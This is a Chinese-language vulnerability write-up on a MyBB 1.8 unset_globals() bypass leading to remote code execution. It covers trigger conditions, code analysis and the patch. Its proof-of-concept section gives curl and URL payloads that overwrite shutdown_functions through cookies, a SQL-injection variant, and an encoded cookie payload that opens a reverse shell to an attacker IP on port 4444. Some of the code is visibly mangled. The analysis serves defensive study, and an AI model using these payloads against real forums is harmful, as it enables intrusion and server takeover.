catalogue 1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考
1. 漏洞描述 mybb's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution.
relevant link: https://cxsecurity.com/issue/wlb-2015120164https://packetstormsecurity.com/files/134833/mybb-1.8.2-code-execution.htmlhttps://www.exploit-db.com/exploits/35323/
2. 漏洞触发条件
0x1: poc1
//php.ini配置1. request_order = gp2. register_globals = on//remote code execution by just using curl on the command line3. curl --cookie globals=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1 http://30.9.192.207/mybb_1802/
php自动化验证脚本
0x2: poc2
//php.ini1. disable_functions = ini_get2. register_globals = on//url3. index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
0x3: poc3
//php.ini配置1. request_order = gp2. register_globals = on//urlcurl --cookie globals=1; shutdown_queries[]=sql_inj http://www.target/css.php//works on disable_functions = ini_get and register\_globals = on:css.php?shutdown_queries[]=sql_inj
3. 漏洞影响范围
mybb 1.8 unset_globals($_get); $this->unset_globals($_files); $this->unset_globals($_cookie);}../** * unsets globals from a specific array. * * @param array the array to unset from. */function unset_globals($array){ if(!is_array($array)) { return; } foreach(array_keys($array) as $key) { unset($globals[$key]); unset($globals[$key]); // double unset to circumvent the zend_hash_del_key_or_index hole in php <4.4.3 and <5.1.4 }}
这个逻辑看起来好像没问题，而且是出于安全方面的考虑进行了防御性处理，但是因为php内核的一些特性，导致unset_globals()函数的执行能够被绕过
1. 在正常情况下，通过gpc方式输入的变量，即使开启了register_globals，也会被自动进行unset $global[$var]处理，这是mybb自己实现了一套防御低版本php误开启register_globals = on的代码逻辑，这防御了本地变量覆盖的发生2. 但是存在一个特殊的变量globals，$globals超全局数组是php内核负责创建维护的，我们可以在程序中任意位置读写$globals['key']，php内核绑定了$globals数组和global symbol table之间的连接3. 如果黑客传入: foo.php?globals=1，则mybb会执行unset($globals[globals]);这会直接导致$globals和global symbol table之间的连接4. 而这直接导致的后果是$_get、$_post、$_cookie..中无法再获取到用户传入的参数key，因为本质上gpc的参数是从$globals中拿到的，所以unset操作也就无法正常进行
需要注意的是，mybb的防御框架里注意到了这个问题\mybb_1802\inc\class_core.php
..function __construct(){ // set up mybb $protected = array(_get, _post, _server, _cookie, _files, _env, globals); foreach($protected as $var) { if(isset($_request[$var]) || isset($_files[$var])) { die(hacking attempt); } } ..
mybb的本意是阻止请求参数中出现get/post/globals这种可能影响全局变量参数的值，但是问题在php中的$_request也是一个超全局变量，它的值受php.ini影响，在php5.3以后，request_order = gp，也就是说，$_request只包括get/post中的参数，这直接导致了对cookies的敏感参数过滤失效，所以，黑客可以在cookies中放入变量覆盖攻击payload
globals=1; shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2dr%20%27%24sock%3dfsockopen%28%22$yourip%22%2c%204444%29%3bexec%28%22%2fbin%2fsh%20%2di%20%3c%263%20%3e%263%202%3e%263%22%29%3b%27;
稍微总结一下，这个利用前提条件有2种场景
1. mybb <= php 5.3: request_order = gp2. php 5.3 <= mybb has_errors)) { return; } .. // run any shutdown functions if we have them if(is_array($shutdown_functions)) { foreach($shutdown_functions as $function) { call_user_func_array($function['function'], $function['arguments']); } } ..
relevant link: http://0day.today/exploit/22913
5. 防御方法
\inc\class_core.php
class mybb { .. function __construct() { // set up mybb $protected = array(_get, _post, _server, _cookie, _files, _env, globals); foreach($protected as $var) { /*if(isset($_request[$var]) || isset($_files[$var]))*/ if(isset($_get[$var]) || isset($_post[$var]) || isset($_cookie[$var]) || isset($_files[$var])) { die(hacking attempt); } } ..
relevant link: http://blog.mybb.com/2014/11/20/mybb-1-8-3-1-6-16-released-security-releases/http://cn.313.ninja/exploit/22913
6. 攻防思考
copyright (c) 2016 little5ann all rights reserved